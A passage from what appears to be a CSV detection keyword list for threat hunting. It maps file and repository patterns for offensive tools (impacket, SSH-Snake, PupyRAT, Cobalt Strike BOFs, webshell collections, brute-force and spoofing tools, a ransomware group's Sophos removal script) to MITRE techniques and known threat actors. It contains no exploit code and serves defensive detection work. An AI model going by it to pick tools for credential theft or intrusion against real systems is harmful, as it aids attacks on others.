T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","11455" "*/SnaffPoint.git*",".{0,1000}\/SnaffPoint\.git.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","N/A","7","3","254","25","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z","11456" "*/Snake.nocomments.sh*",".{0,1000}\/Snake\.nocomments\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","11457" 
"*/Snake.sh*",".{0,1000}\/Snake\.sh.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","11458" "*/sniff.py*",".{0,1000}\/sniff\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11459" "*/sniff.py*",".{0,1000}\/sniff\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11460" "*/sniffer.exe*",".{0,1000}\/sniffer\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11461" "*/sniffer.git*",".{0,1000}\/sniffer\.git.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","N/A","8","769","67","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z","11462" "*/sniffer.py*",".{0,1000}\/sniffer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11463" "*/sniffer.py*",".{0,1000}\/sniffer\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","1","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","11464" "*/sniffer-detect.nse*",".{0,1000}\/sniffer\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11465" "*/sniffpass-x64*",".{0,1000}\/sniffpass\-x64.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","11466" "*/SnIpEr_SA Shell.php*",".{0,1000}\/SnIpEr_SA\sShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","11467" "*/snmp-brute.nse*",".{0,1000}\/snmp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11468" "*/snmp-hh3c-logins.nse*",".{0,1000}\/snmp\-hh3c\-logins\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11469" "*/snmp-info.nse*",".{0,1000}\/snmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11470" "*/snmp-interfaces.nse*",".{0,1000}\/snmp\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11471" "*/snmp-ios-config.nse*",".{0,1000}\/snmp\-ios\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11472" "*/snmp-netstat.nse*",".{0,1000}\/snmp\-netstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11473" "*/snmp-processes.nse*",".{0,1000}\/snmp\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11474" "*/snmp-sysdescr.nse*",".{0,1000}\/snmp\-sysdescr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11475" "*/snmp-win32-services.nse*",".{0,1000}\/snmp\-win32\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11476" "*/snmp-win32-shares.nse*",".{0,1000}\/snmp\-win32\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11477" "*/snmp-win32-software.nse*",".{0,1000}\/snmp\-win32\-software\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11478" "*/snmp-win32-users.nse*",".{0,1000}\/snmp\-win32\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11479" "*/snmpwn.git*",".{0,1000}\/snmpwn\.git.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do.","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","N/A","3","253","43","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z","11480" "*/snmpwn.rb*",".{0,1000}\/snmpwn\.rb.{0,1000}","offensive_tool_keyword","snmpwn","SNMPwn is an SNMPv3 user enumerator and attack tool. It is a legitimate security tool designed to be used by security professionals and penetration testers against hosts you have permission to test. 
It takes advantage of the fact that SNMPv3 systems will respond with Unknown user name when an SNMP user does not exist. allowing us to cycle through large lists of users to find the ones that do","T1210 - T1212 - T1558","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hatlord/snmpwn","1","1","N/A","N/A","N/A","3","253","43","2020-08-23T10:41:38Z","2016-06-16T10:31:13Z","11481" "*/snsenum.py*",".{0,1000}\/snsenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","11482" "*/SOAPHound.exe*",".{0,1000}\/SOAPHound\.exe.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","11483" "*/SOAPHound.git*",".{0,1000}\/SOAPHound\.git.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","11484" "*/SOAPHound/Program.cs*",".{0,1000}\/SOAPHound\/Program\.cs.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","1","N/A","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","11485" 
"*/SocialBox.sh*",".{0,1000}\/SocialBox\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","11486" "*/SocialBox-Termux*",".{0,1000}\/SocialBox\-Termux.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","N/A","10","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","11487" "*/SocialPwned*",".{0,1000}\/SocialPwned.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. 
Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","11488" "*/SOCK5Server.cpp*",".{0,1000}\/SOCK5Server\.cpp.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","11489" "*/socks5proxy.py*",".{0,1000}\/socks5proxy\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","11490" "*/socks-auth-info.nse*",".{0,1000}\/socks\-auth\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11491" "*/socks-brute.nse*",".{0,1000}\/socks\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11492" "*/socks-open-proxy.nse*",".{0,1000}\/socks\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11493" "*/SolarFlare.exe*",".{0,1000}\/SolarFlare\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11501" "*/SomalifuscatorV2.git*",".{0,1000}\/SomalifuscatorV2\.git.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","1","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","11503" "*/Sophos Removal Tool.ps1*",".{0,1000}\/Sophos\sRemoval\sTool\.ps1.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove Sophos","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","11504" 
"*/Sophos%20Removal%20Tool.ps1*",".{0,1000}\/Sophos\%20Removal\%20Tool\.ps1.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group to remove Sophos","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","11505" "*/SpaceRunner.git*",".{0,1000}\/SpaceRunner\.git.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","11508" "*/SpamChannel.git*",".{0,1000}\/SpamChannel\.git.{0,1000}","offensive_tool_keyword","SpamChannel","Spoof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","N/A","8","4","335","36","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z","11509" "*/spawn.git*",".{0,1000}\/spawn\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. 
and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/spawn","1","1","N/A","N/A","10","10","455","73","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z","11510" "*/specagents.py*",".{0,1000}\/specagents\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11511" "*/specmodule.py*",".{0,1000}\/specmodule\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11512" "*/specpayload.py*",".{0,1000}\/specpayload\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - 